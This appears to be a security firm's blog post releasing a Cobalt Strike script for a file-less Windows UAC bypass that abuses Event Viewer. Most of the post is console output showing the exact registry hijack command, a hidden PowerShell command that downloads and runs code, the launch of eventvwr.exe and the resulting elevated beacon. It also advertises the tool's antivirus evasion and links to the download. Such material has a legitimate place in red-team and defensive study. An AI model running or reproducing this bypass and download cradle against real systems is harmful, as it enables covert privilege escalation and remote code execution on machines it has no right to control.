-
Adversary Simulation
Our best in class red team can deliver a holistic cyber attack simulation to provide a true evaluation of your organisation’s cyber resilience.
-
Application
SecurityLeverage the team behind the industry-leading Web Application and Mobile Hacker’s Handbook series.
-
Penetration
TestingMDSec’s penetration testing team is trusted by companies from the world’s leading technology firms to global financial institutions.
-
Response
Our certified team work with customers at all stages of the Incident Response lifecycle through our range of proactive and reactive services.
Eventvwr File-less UAC Bypass CNA
Matt Nelson recently released a very useful, file-less UAC bypass using Event Viewer which was quickly implemented in to a Metasploit module by @TheColonial. Following this, we decided to release our own implementation in the form of a Cobalt Strike CNA script. The current default UAC bypass in Cobalt Strike requires DLL hijacking and drops a temporary DLL artefact to disk, as shown in the following:
[code lang=”bash”]
beacon> bypassuac
[*] Tasked beacon to spawn windows/beacon_smb/bind_pipe (127.0.0.1:6667) in a high integrity process
[+] host called home, sent: 111759 bytes
[+] received output:
[*] Wrote hijack DLL to ‘C:\Users\vysec\AppData\Local\Temp\0a80.dll’
[+] Privileged file copy success! C:\WINDOWS\System32\NTWDBLIB.dll
[+] C:\WINDOWS\System32\cliconfg.exe ran and exited.
[*] Cleanup successful
[/code]
Bypassuac-eventvwr was created as a way to easily utilise the EventVwr UAC bypass technique and maintain good opsec practices by not touching disk. This method does not require writing to disk and therefore should be AV friendly.
The CNA script currently performs the following:
- Write registry path hijack
- Execute eventvwr.exe
- When eventvwr.exe executes, the hijack will be called
- If SMB is used, linking is performed to the new beacon
- Delete registry path hijack
- Enjoy elevated beacon
An example usage is shown below:
[code lang=”bash”]
beacon> bypassuac-eventvwr “smb”
[*] Tasked Beacon to BypassUAC to windows/beacon_smb/bind_pipe (127.0.0.1:6667) via Eventvwr Fileless UAC Bypass
[*] Adding Registry Key
[*] reg add “HKCU\Software\Classes\mscfile\shell\open\command” /f /d “cmd.exe /c powershell -nop -w hidden -c \”IEX ((new-object net.webclient).downloadstring(‘http://127.0.0.1:8390/’))
[*] Tasked beacon to run: reg add “HKCU\Software\Classes\mscfile\shell\open\command” /f /d “cmd.exe /c powershell -nop -w hidden -c \”IEX ((new-object net.webclient).downloadstring(‘http://127.0.0.1:8390/’))
[*] Spawning Eventvwr.exe
[*] Tasked beacon to run: eventvwr.exe
[+] host called home, sent: 3253 bytes
[*] Deleting Registry Key
[*] reg delete “HKCU\Software\Classes\mscfile\shell\open\command” /f
[*] Tasked beacon to run: reg delete “HKCU\Software\Classes\mscfile\shell\open\command” /f
[+] received output:
The operation completed successfully.
[+] host called home, sent: 196761 bytes
[+] established link to child beacon: 192.168.114.134
[+] received output:
The operation completed successfully.
[/code]
A brief demonstration of how to use this module is shown below:
You can download Bypassuac-eventvwr from the @MDSecLabs github.
This blog post was written by @vysecurity.
